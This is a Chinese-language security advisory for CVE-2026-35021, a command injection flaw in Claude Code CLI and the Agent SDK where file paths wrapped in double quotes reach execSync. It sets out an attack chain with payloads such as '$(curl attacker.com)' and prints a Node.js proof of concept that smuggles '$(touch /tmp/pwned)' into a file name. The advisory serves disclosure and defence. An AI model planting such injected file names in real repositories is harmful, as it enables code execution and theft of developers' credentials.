IPBUF安全漏洞报告
English
CVE-2026-35021 CVSS 7.8 高危

CVE-2026-35021: Anthropic Claude CLI命令注入漏洞

披露日期: 2026-04-06
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-35021
漏洞类型
操作系统命令注入
CVSS评分
7.8 高危
攻击向量
本地 (AV:L)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
Anthropic Claude Code CLI, Claude Agent SDK

相关标签

命令注入RCEAnthropicClaudeCVE-2026-35021OS Command Injection

漏洞概述

Anthropic Claude Code CLI和Claude Agent SDK存在严重的操作系统命令注入漏洞。该漏洞位于提示编辑器调用工具中,允许攻击者通过构造恶意文件路径注入Shell元字符,绕过双引号限制,从而在运行CLI的用户权限下执行任意操作系统命令。

技术细节

该漏洞的核心在于应用程序使用`execSync`执行Shell命令时,对文件路径的处理逻辑存在缺陷。尽管开发人员将文件路径包裹在双引号中,试图防止参数注入,但在POSIX Shell语义(POSIX §2.2.3)下,双引号并不能阻止命令替换功能(如`$()`或反引号表达式)。攻击者可以精心设计包含恶意Payload的文件路径,当应用程序将其拼接到Shell命令中执行时,注入的元字符会被Shell解析器评估并执行。由于该工具通常以开发者的用户权限运行,成功利用此漏洞可导致任意代码执行,进而窃取凭证、破坏系统完整性或进行横向移动。

攻击链分析

STEP 1
1. 侦察与准备
攻击者识别目标环境正在使用Anthropic Claude Code CLI或Agent SDK,并准备恶意文件路径Payload。
STEP 2
2. 构造恶意载荷
攻击者利用POSIX Shell特性,在文件名中插入命令替换元字符(如 `$(whoami)` 或 `$(curl attacker.com)`)。
STEP 3
3. 诱导触发
攻击者诱导受害者使用受影响的CLI工具处理包含恶意路径的文件,或将其提交到受害者的代码仓库中等待自动处理。
STEP 4
4. 漏洞利用
CLI工具调用`execSync`处理该路径,由于双引号未转义命令替换,注入的Shell命令被系统执行。
STEP 5
5. 后果执行
攻击者在受害者用户权限下获得任意代码执行能力,可窃取API密钥、植入后门或破坏开发环境。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
// PoC Concept for CVE-2026-35021 // Demonstrating command substitution within double quotes const { execSync } = require('child_process'); // Vulnerable Scenario: App takes a filename and runs it in a shell command // e.g., editor "[USER_INPUT]" // Attacker creates a malicious file path containing command substitution // The payload attempts to create a file 'pwned' in /tmp const maliciousFilePath = 'normal_$(touch /tmp/pwned).txt'; // Simulating the vulnerable code pattern found in the CLI try { // The double quotes allow the $() to execute const command = `echo "Opening file: ${maliciousFilePath}"`; console.log(`Executing command: ${command}`); // This will execute 'touch /tmp/pwned' due to the vulnerability const output = execSync(command, { encoding: 'utf-8' }); console.log('Output:', output); console.log('Check if /tmp/pwned was created.'); } catch (error) { console.error('Execution failed:', error); }

影响范围

Anthropic Claude Code CLI (具体受影响版本请参考官方公告)
Claude Agent SDK (具体受影响版本请参考官方公告)

防御指南

临时缓解措施
建议用户关注官方发布的安全更新,并尽快应用补丁。在补丁未应用前,应避免处理来源不明或包含特殊字符的文件路径,同时在沙箱或隔离环境中运行该CLI工具以降低潜在风险。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表